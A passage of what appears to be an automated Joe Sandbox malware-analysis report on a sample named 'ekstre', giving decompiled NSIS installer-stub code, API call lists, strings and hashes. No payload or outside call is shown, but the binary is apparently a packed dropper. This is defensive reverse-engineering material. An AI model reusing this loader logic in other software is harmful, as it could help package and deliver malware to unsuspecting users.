											_t237 = _t158;
											if(_t158 == 0) {
												goto L53;
											}
											goto L43;
										}
										goto L35;
									}
									_t198 =  *((intOrPtr*)(_t95 + 4));
									__eflags = _t198 - 0x20;
									if(_t198 == 0x20) {
										L33:
										_t42 =  &_v12;
										 *_t42 = _v12 | 0x00000004;
										__eflags =  *_t42;
										goto L34;
									}
									__eflags = _t198;
									if(_t198 != 0) {
										goto L34;
									}
									goto L33;
								}
								_t199 =  *(_t95 + 1);
								__eflags = _t199 - 0x20;
								if(_t199 == 0x20) {
									L29:
									 *0x7c6000 = 1;
									goto L30;
								}
								__eflags = _t199;
								if(_t199 != 0) {
									goto L30;
								}
								goto L29;
							}
						} else {
							goto L22;
						}
						do {
							L22:
							_t95 = _t95 + 1;
							__eflags =  *_t95 - 0x20;
						} while ( *_t95 == 0x20);
						goto L23;
					}
					goto L40;
					L14:
					E004065D2(_t217); // executed
					_t217 =  &(_t217[lstrlenA(_t217) + 1]);
					if( *_t217 != 0) {
						goto L14;
					} else {
						E00406640(0xb);
						 *0x7c5f64 = E00406640(9);
						_t87 = E00406640(7);
						if(_t87 != 0) {
							_t87 =  *_t87(0x1e);
							if(_t87 != 0) {
								 *0x7c601c =  *0x7c601c | 0x00000080;
							}
						}
						__imp__#17(_t170);
						__imp__OleInitialize(0); // executed
						 *0x7c6020 = _t87;
						SHGetFileInfoA(0x7a8d28, 0,  &_v548, 0x160, 0); // executed
						E00406234(0x7c1f60, "NSIS Error");
						E00406234(0x7ef000, GetCommandLineA());
						 *0x7c5f60 = 0x400000;
						_t93 = 0x7ef000;
						if( *0x7ef000 == 0x22) {
							_v16 = 0x22;
							_t93 = 0x7ef001;
						}
						_t95 = CharNextA(E00405BF1(_t93, _v16));
						_v24 = _t95;
						goto L37;
					}
				}
				_v196.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v196);
				if(_v196.dwPlatformId != 2) {
					goto L4;
				} else {
					_v42 = 4;
					asm("sbb eax, eax");
					_v48 =  !( ~(_v196.szCSDVersion - 0x53)) & _v163 - 0x00000030;
					goto L3;
				}
			}

0x004033a2
0x004033a5
0x004033ac
0x004033af
0x004033b3
0x004033c6
0x004033cc
0x004033cf
0x004033d2
0x004033e0
0x00403421
0x00403421
0x00403428
0x00403428
0x0040342a
0x00403435
0x00403448
0x00403437
0x00403442
0x00403442
0x00403435
0x00403453
0x00403455
0x00403455
0x0040346a
0x0040348f
0x0040349d
0x004034a0
0x004034a7
0x004034ae
0x004034ae
0x004034a7
0x004034b0
0x004034b0
0x00403637
0x00403637
0x00403637
0x00403639
0x0040363b
0x00000000
0x00000000
0x0040357b
0x0040357e
0x00403586
0x00403586
0x00403589
0x0040358d
0x0040358f
0x0040358f
0x00403590
0x00403590
0x00403594
0x00403597
0x00403628
0x0040362c
0x00403631
0x00403634
0x00403636
0x00403636
0x00403636
0x00000000
0x0040359d
0x0040359d
0x0040359e
0x004035a1
0x004035b9
0x004035e4
0x004035e6
0x004035f8
0x00403623
0x00403626
0x00403643
0x00403647
0x00403650
0x00403655
0x00403666
0x00403668
0x0040366d
0x0040366f
0x004036c7
0x004036cc
0x004036d5
0x004036dc
0x004036df
0x00403772
0x00403772
0x00403777
0x00403780
0x00403783
0x004038ac
0x004038b2
0x0040392a
0x0040392a
0x0040392f
0x00403932
0x00403934
0x00403934
0x0040393a
0x0040393a
0x004038c1
0x004038c7
0x004038c9
0x004038d5
0x004038e6
0x004038ed
0x004038f4
0x004038f4
0x004038fc
0x00403901
0x00403908
0x00403916
0x00403919
0x0040391f
0x00403921
0x00000000
0x00000000
0x00000000
0x0040390a
0x00403910
0x00403912
0x00403914
0x00403923
0x00403925
0x00000000
0x00403925
0x00000000
0x00403914
0x00403908
0x00403791
0x00403798
0x00403798
0x004036eb
0x00403763
0x00403763
0x0040376f
0x00000000
0x0040376f
0x004036f4
0x004036f8
0x0040372e
0x0040372e
0x00403730
0x00403737
0x004037a9
0x004037ab
0x004037b2
0x004037ba
0x004037ba
0x004037c5
0x004037d9
0x004037dd
0x004037de
0x004037e7
0x004037e0
0x004037e0
0x004037e0
0x004037ed
0x004037fa
0x00403802
0x00403802
0x0040380f
0x00403814
0x0040381e
0x00403832
0x00403838
0x00403844
0x0040384a
0x00403850
0x00403855
0x0040386b
0x0040387c
0x00403882
0x00403889
0x0040388c
0x00403892
0x00403892
0x00403889
0x00403895
0x0040389b
0x0040389b
0x0040389b
0x004038a2
0x004038a2
0x00000000
0x004037d9
0x00403739
0x0040373c
0x00403747
0x00000000
0x00000000
0x0040374f
0x0040375a
0x0040375f
0x00000000
0x0040375f
0x00403723
0x00403725
0x00403729
0x0040372c
0x00000000
0x00000000
0x00000000
0x0040372c
0x00000000
0x00403725
0x00403677
0x00403683
0x00403688
0x0040368d
0x0040368f
0x00000000
0x00000000
0x00403697
0x0040369f
0x004036b0
0x004036b8
0x004036ba
0x004036bf
0x004036c1
0x00000000
0x00000000
0x00000000
0x004036c1
0x00000000
0x00403626
0x004035e8
0x004035eb
0x004035ee
0x004035f4
0x004035f4
0x004035f4
0x004035f4
0x00000000
0x004035f4
0x004035f0
0x004035f2
0x00000000
0x00000000
0x00000000
0x004035f2
0x004035a3
0x004035a6
0x004035a9
0x004035af
0x004035af
0x00000000
0x004035af
0x004035ab
0x004035ad
0x00000000
0x00000000
0x00000000
0x004035ad
0x00000000
0x00000000
0x00000000
0x00403580
0x00403580
0x00403580
0x00403581
0x00403581
0x00000000
0x00403580
0x00000000
0x004034b5
0x004034b6
0x004034c2
0x004034c9
0x00000000
0x004034cb
0x004034cd
0x004034db
0x004034e0
0x004034e7
0x004034eb
0x004034ef
0x004034f1
0x004034f1
0x004034ef
0x004034f9
0x00403500
0x00403506
0x0040351e
0x0040352e
0x00403540
0x0040354c
0x00403556
0x00403558
0x0040355a
0x0040355e
0x0040355e
0x0040356d
0x00403573
0x00000000
0x00403573
0x004034c9
0x004033e8
0x004033f3
0x004033fc
0x00000000
0x004033fe
0x00403411
0x00403417
0x0040341d
0x00000000
0x0040341d

APIs

SetErrorMode.KERNELBASE(00008001), ref: 004033B3
GetVersionExA.KERNEL32(?), ref: 004033DC
GetVersionExA.KERNEL32(0000009C), ref: 004033F3
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BC
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 004034F9
OleInitialize.OLE32(00000000), ref: 00403500
SHGetFileInfoA.SHELL32(007A8D28,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 0040351E
GetCommandLineA.KERNEL32(007C1F60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403533
CharNextA.USER32(00000000,007EF000,00000020,007EF000,00000000,?,00000007,00000009,0000000B), ref: 0040356D
GetTempPathA.KERNELBASE(00002000,007F9000,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403666
GetWindowsDirectoryA.KERNEL32(007F9000,00001FFB,?,00000007,00000009,0000000B), ref: 00403677
lstrcatA.KERNEL32(007F9000,\Temp,?,00000007,00000009,0000000B), ref: 00403683
GetTempPathA.KERNEL32(00001FFC,007F9000,007F9000,\Temp,?,00000007,00000009,0000000B), ref: 00403697
lstrcatA.KERNEL32(007F9000,Low,?,00000007,00000009,0000000B), ref: 0040369F
SetEnvironmentVariableA.KERNEL32(TEMP,007F9000,007F9000,Low,?,00000007,00000009,0000000B), ref: 004036B0
SetEnvironmentVariableA.KERNEL32(TMP,007F9000,?,00000007,00000009,0000000B), ref: 004036B8
DeleteFileA.KERNELBASE(007F7000,?,00000007,00000009,0000000B), ref: 004036CC
OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403777
ExitProcess.KERNEL32 ref: 00403798
lstrcatA.KERNEL32(007F9000,~nsu,007EF000,00000000,?,?,00000007,00000009,0000000B), ref: 004037AB
lstrcatA.KERNEL32(007F9000,0040A14C,007F9000,~nsu,007EF000,00000000,?,?,00000007,00000009,0000000B), ref: 004037BA
lstrcatA.KERNEL32(007F9000,.tmp,007F9000,~nsu,007EF000,00000000,?,?,00000007,00000009,0000000B), ref: 004037C5
lstrcmpiA.KERNEL32(007F9000,007F5000), ref: 004037D1
SetCurrentDirectoryA.KERNEL32(007F9000,007F9000,?,00000007,00000009,0000000B), ref: 004037ED
DeleteFileA.KERNEL32(007A6D28,007A6D28,?,007C7000,?,?,00000007,00000009,0000000B), ref: 0040384A
CopyFileA.KERNEL32(007FD000,007A6D28,00000001), ref: 0040385F
CloseHandle.KERNEL32(00000000,007A6D28,007A6D28,?,007A6D28,00000000,?,00000007,00000009,0000000B), ref: 0040388C
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038BA
OpenProcessToken.ADVAPI32(00000000), ref: 004038C1
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038D5
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004038F4
ExitWindowsEx.USER32(00000002,80040002), ref: 00403919
ExitProcess.KERNEL32 ref: 0040393A

Strings

A, xrefs: 0040342E
Low, xrefs: 00403699
UXTHEME, xrefs: 004034B0, 004034B5, 004034BB
~nsu, xrefs: 004037A3
\Temp, xrefs: 0040367D
SeShutdownPrivilege, xrefs: 004038CF
`Kv, xrefs: 004036A4
NSIS Error, xrefs: 00403524
", xrefs: 00403590
TMP, xrefs: 004036B3
(mz, xrefs: 0040382B
.tmp, xrefs: 004037BF
Error launching installer, xrefs: 00403730
TEMP, xrefs: 004036AB
C:\Users\user\procharity\Anasarca\Uncompelled\Ediktet\Tavlemestrene\Ungeneral, xrefs: 00403755

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "$(mz$.tmp$A$C:\Users\user\procharity\Anasarca\Uncompelled\Ediktet\Tavlemestrene\Ungeneral$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kv$~nsu
API String ID: 1000954069-1574634617
Opcode ID: 4b3ecca13ad1d89bf27461f46d4b6a4bca2dd1a776d39315b104c0e5dc413868
Instruction ID: 7e74485806d2b793dcf709e060cc566b5fe55edb9541ac3c3a81dfed3b1f634f
Opcode Fuzzy Hash: 4b3ecca13ad1d89bf27461f46d4b6a4bca2dd1a776d39315b104c0e5dc413868
Instruction Fuzzy Hash: 22E1C470904254AADB21AF759D49B6F7FB89F46306F0480BEF541B62D2CB7C4A44CB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402F0C Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402F0C(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x7c5f6c = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, 0x7fd000, 0x2000);
				_t89 = E00405DC7(0x7fd000, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406234(0x7f5000, 0x7fd000);
				E00406234(0x7ff000, E00405C0D(0x7f5000));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x7a6d24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402EA8(1);
					__eflags =  *0x7c5f74 - _t82;
					if( *0x7c5f74 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403348( *0x7c5f74 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00403143(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7c5f70 = _t94;
							 *0x7c5f78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7c5f7c =  *0x7c5f7c + 1;
								__eflags =  *0x7c5f7c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405D82(0x7c5f80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403348( *0x79ad18);
					_t65 = E00403332( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7c5f74) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403332(0x792d18, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402EA8(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7c5f74;
						if( *0x7c5f74 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402EA8(0);
							}
							goto L20;
						}
						E00405D82( &_v44, 0x792d18, "true");
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x79ad18; // 0x4e83a
						 *0x7c6000 =  *0x7c6000 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7c5f74 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x5
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x7a6d24; // 0x4e83e
						if(__eflags < 0) {
							_v12 = E004066F7(_v12, 0x792d18, _t90);
						}
						 *0x79ad18 =  *0x79ad18 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402f14
0x00402f17
0x00402f1a
0x00402f34
0x00402f39
0x00402f4c
0x00402f51
0x00402f54
0x00402f5a
0x00000000
0x00402f5c
0x00402f6d
0x00402f7e
0x00402f85
0x00402f8b
0x00402f8d
0x00402f92
0x00402f94
0x0040307f
0x00403081
0x00403086
0x0040308d
0x00000000
0x00000000
0x0040308f
0x00403092
0x004030b6
0x004030bb
0x004030c1
0x004030cc
0x004030d1
0x004030d4
0x004030d5
0x004030d6
0x004030d8
0x004030dd
0x004030e0
0x004030f3
0x004030f7
0x004030ff
0x00403104
0x00403106
0x00403106
0x00403106
0x0040310e
0x0040310e
0x00403111
0x00403112
0x00403112
0x00403115
0x00403117
0x00403117
0x00403117
0x00403121
0x00403127
0x00403135
0x0040313a
0x00000000
0x0040313a
0x00000000
0x004030e0
0x0040309a
0x004030a5
0x004030aa
0x004030ac
0x00000000
0x00000000
0x004030b1
0x004030b4
0x00000000
0x00000000
0x00000000
0x00402f9a
0x00402f9f
0x00402fa4
0x00402fa8
0x00402faf
0x00402fb4
0x00402fb6
0x00402fb8
0x00402fb8
0x00402fbc
0x00402fc1
0x00402fc3
0x004030eb
0x004030e2
0x00000000
0x004030e2
0x00402fc9
0x00402fd0
0x0040304c
0x00403050
0x00403054
0x00403059
0x00000000
0x00403050
0x00402fd9
0x00402fde
0x00402fe1
0x00402fe6
0x00000000
0x00000000
0x00402fe8
0x00402fef
0x00000000
0x00000000
0x00402ff1
0x00402ff8
0x00000000
0x00000000
0x00402ffa
0x00403001
0x00000000
0x00000000
0x00403003
0x0040300a
0x00000000
0x00000000
0x0040300c
0x00403012
0x0040301b
0x00403021
0x00403024
0x00403026
0x0040302c
0x00000000
0x00000000
0x00403032
0x00403036
0x0040303e
0x0040303e
0x00403041
0x00403041
0x00403044
0x00403046
0x00403048
0x00403048
0x00000000
0x00403046
0x00403038
0x0040303c
0x00000000
0x00000000
0x00000000
0x0040305a
0x0040305a
0x00403060
0x0040306c
0x0040306c
0x0040306f
0x00403075
0x00403075
0x00403075
0x0040307d
0x0040307d
0x00000000
0x0040307d

APIs

GetTickCount.KERNEL32 ref: 00402F1D
GetModuleFileNameA.KERNEL32(00000000,007FD000,00002000,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00402F39

Part of subcall function 00405DC7: GetFileAttributesA.KERNELBASE(00000003,00402F4C,007FD000,80000000,00000003,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DCB
Part of subcall function 00405DC7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DED

GetFileSize.KERNEL32(00000000,00000000,007FF000,00000000,007F5000,007F5000,007FD000,007FD000,80000000,00000003,?,?,004036DA,?,?,00000007), ref: 00402F85
GlobalAlloc.KERNELBASE(00000040,00000007,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 004030BB

Strings

Null, xrefs: 00403003
soft, xrefs: 00402FFA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 004030E2
Error launching installer, xrefs: 00402F5C
Inst, xrefs: 00402FF1

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1074636621
Opcode ID: ccfa8ece6b5d7c4bc2a75011a0cf13bb4d0b13ea53226f34efe571a73c4d02a0
Instruction ID: 2ea85dbe2d09deba88a00fa1acdf7f4cc296daf3ab3279517ce880d50f7f1faa
Opcode Fuzzy Hash: ccfa8ece6b5d7c4bc2a75011a0cf13bb4d0b13ea53226f34efe571a73c4d02a0
Instruction Fuzzy Hash: 1751A071A01208ABDB20AF64DD85B5E7FACEB04356F20813FF501B62D5C77D9E818A9D

Uniqueness

Uniqueness Score: -1.00%

Function 004059F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E004059F6(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CB4(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x7c5fe8 =  *0x7c5fe8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406234(0x7b8d70, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C0D(_t73);
					} else {
						lstrcatA(0x7b8d70, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x7b8d70,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405BF1( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406234(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059AE(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405355(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x7c5fe8 =  *0x7c5fe8 + 1;
										} else {
											E00405355(0xfffffff1, _t73);
											E0040600D(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004059F6(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x7b8d70 - 0x5c;
					if( *0x7b8d70 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065AB(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BC6(_t73);
							_t40 = E004059AE(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405355(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405355(0xfffffff1, _t73);
							return E0040600D(_t72, _t73, 0);
						}
						L33:
						 *0x7c5fe8 =  *0x7c5fe8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x00405a00
0x00405a05
0x00405a0e
0x00405a11
0x00405a19
0x00405a1c
0x00405a1f
0x00405a27
0x00405a29
0x00405a2a
0x00000000
0x00405a2a
0x00405a35
0x00405a38
0x00405a38
0x00405a38
0x00405a3c
0x00405a4f
0x00405a56
0x00405a5b
0x00405a5f
0x00405a6f
0x00405a61
0x00405a67
0x00405a67
0x00405a74
0x00405a77
0x00405a82
0x00405a88
0x00405a8d
0x00405a9d
0x00405a9f
0x00405aa5
0x00405aa8
0x00405aab
0x00405b63
0x00405b63
0x00405b67
0x00405b69
0x00405b69
0x00405b69
0x00405b69
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ab1
0x00405ab1
0x00405aba
0x00405ac0
0x00405ac5
0x00405ac8
0x00405aca
0x00405ace
0x00405ad0
0x00405ad0
0x00405ace
0x00405ad3
0x00405ad6
0x00405ae9
0x00405aeb
0x00405af0
0x00405af7
0x00405b12
0x00405b17
0x00405b19
0x00405b3d
0x00405b1b
0x00405b1b
0x00405b1e
0x00405b32
0x00405b20
0x00405b23
0x00405b2b
0x00405b2b
0x00405b1e
0x00405af9
0x00405aff
0x00405b01
0x00405b07
0x00405b07
0x00405b01
0x00000000
0x00405af7
0x00405ad8
0x00405adb
0x00405add
0x00000000
0x00000000
0x00405adf
0x00405ae1
0x00000000
0x00000000
0x00405ae3
0x00405ae7
0x00000000
0x00000000
0x00000000
0x00405b42
0x00405b4c
0x00405b52
0x00405b52
0x00405b5d
0x00000000
0x00405b5d
0x00405a79
0x00405a80
0x00000000
0x00000000
0x00000000
0x00405a3e
0x00405a3e
0x00405a40
0x00405b6d
0x00405b6f
0x00405b72
0x00405bc3
0x00405bc3
0x00405bc3
0x00405b74
0x00405b77
0x00405b82
0x00405b87
0x00405b89
0x00000000
0x00000000
0x00405b8c
0x00405b98
